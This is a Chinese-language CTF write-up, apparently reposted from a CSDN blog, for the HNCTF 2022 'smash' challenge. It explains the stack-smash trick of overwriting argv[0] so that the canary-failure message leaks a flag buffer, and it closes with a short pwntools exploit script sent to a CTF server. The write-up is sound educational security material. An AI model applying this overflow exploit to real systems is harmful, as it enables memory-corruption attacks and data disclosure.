[HNCTF 2022 WEEK3] smash 复现
2023-12-13 23:23:47
smash
查看保护机制,正如题目的名字smash(所以会涉及到花式栈溢出 stack smash),打开了NX和canary
ida一下,发现gets函数造成了溢出,并且flag存在buf里面
接下来我们就需要了解一下 stack smash(花式栈溢出技巧 - CTF Wiki (ctf-wiki.org))
Stack smash? ? ? ?
? ? ? ?在程序加了 canary 保护之后,如果我们读取的 buffer 覆盖了对应的值时,程序就会报错,而一般来说我们并不会关心报错信息。而 stack smash 技巧则就是利用打印这一信息的程序来得到我们想要的内容。这是因为在程序启动 canary 保护之后,如果发现 canary 被修改的话,程序就会执行?
__stack_chk_fail
?函数来打印 argv[0] 指针所指向的字符串,正常情况下,这个指针指向了程序名。
当我们了解了 Stack smash 后,我们就可以溢出到arg[0],然后将该指针改成buf就能获得flag,下面就开始求偏移
两个地址相减就可得偏移0x208(但是正确的偏移是0x1f8,比正确的偏移多了0x10,问了下学长可能是版本的问题,方法会了就行,小问题不伤大雅)
也可以这样算
exp如下:
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
#p = process(’./pwn’)
p = remote('node5.anna.nssctf.cn',28378)
elf = ELF('./111')
libc = ELF('./libc-2.23.so')
buf_addr =0x404060
payload = b'a'*0x1f8 +p64(buf_addr)
p.sendlineafter(b'Good Luck.\n',payload)
p.interactive()
总结:
这题感觉稍微了解了Stack smash这种花式栈溢出的方法,这题理解起来比较友好,其他的题像网鼎杯那道相同的方法的不太好理解,总之就是自己知识储备不够,加油,卷起来,冲冲冲!!!
文章来源:https://blog.csdn.net/Xzzzz911/article/details/132739314
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!